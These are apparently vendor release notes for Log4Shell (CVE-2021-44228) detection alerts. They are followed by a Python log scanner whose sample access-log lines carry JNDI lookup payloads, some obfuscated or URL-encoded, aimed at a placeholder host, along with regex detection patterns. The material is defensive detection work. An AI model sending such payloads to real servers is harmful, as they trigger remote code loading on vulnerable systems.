Log4Shell detection release notes
This document contains the release notes for the specific detections Devo has released to identify whether your organization is being actively probed for Log4j exploitation susceptibility.
Image credit: Swiss Government Computer Emergency Response Team (GovCERT)
| Data Source | Domains All. Union Table (Data from DNS, Proxy, Web, IDS, and many others) |
|---|---|
| Affected Columns | raw |
| Alert Description | Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. |
| MITRE Tactic | Initial Access TA0001 |
| MITRE Technique | Exploit Public-Facing Application T1190 |

| Data Source | Web |
|---|---|
| Affected Columns | raw |
| Alert Description | Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. |
| MITRE Tactic | Initial Access TA0001 |
| MITRE Technique | Exploit Public-Facing Application T1190 |

| Data Source | Proxy |
|---|---|
| Affected Columns | raw |
| Alert Description | Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. |
| MITRE Tactic | Initial Access TA0001 |
| MITRE Technique | Exploit Public-Facing Application T1190 |

| Data Source | Cloud AWS |
|---|---|
| Affected Columns | raw |
| Alert Description | Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. |
| MITRE Tactic | Initial Access TA0001 |
| MITRE Technique | Exploit Public-Facing Application T1190 |
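The alert descriptions above say the queries look for Log4Shell payload patterns in the raw log message, wherever the payload sits (URL, User-Agent, Referer, request body). As an added illustration that is not Devo's own query logic, the Python below shows the normalization such a raw-message detection needs before matching: URL-decoding and collapsing nested lookup obfuscation. The sample access-log lines and hostnames are constructed placeholders.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Constructed sample web-access lines (not real traffic); hostnames are placeholders.
# Line 0 is benign; lines 1-4 carry a JNDI lookup in the URL, the User-Agent,
# the Referer and a URL-encoded query string respectively.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /?x=${jndi:ldap://scanner.example/a} HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${lower:n}di:rmi://scanner.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "POST /login HTTP/1.1" 302 0 "${jndi:dns://scanner.example/c}" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fd%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# A nested single-character lookup such as ${lower:j}, ${upper:N} or ${::-d}, used to
# break up the literal "jndi" so that naive substring matching misses it.
_OBFUSCATED_CHAR = re.compile(r"\$\{(?:[a-z]+)?:+-?([a-z])\}", re.I)
# The lookup itself, capturing the JNDI scheme (ldap, ldaps, rmi, dns, iiop, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalize(raw: str) -> str:
    """URL-decode (a few rounds, for double encoding) and collapse nested lookups."""
    text = raw
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    prev = None
    while prev != text:  # repeat until no single-character lookups remain
        prev = text
        text = _OBFUSCATED_CHAR.sub(r"\1", text)
    return text.lower()


def scan(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per JNDI lookup found anywhere in each raw line."""
    hits: List[Dict[str, object]] = []
    for idx, raw in enumerate(lines):
        for m in _JNDI.finditer(normalize(raw)):
            hits.append({"line": idx, "scheme": m.group(1), "match": m.group(0)})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

Matching on the normalized text rather than the raw field is what lets a single rule cover URL, header and body placements, and it is also why the scheme list should be kept broad rather than limited to `ldap`.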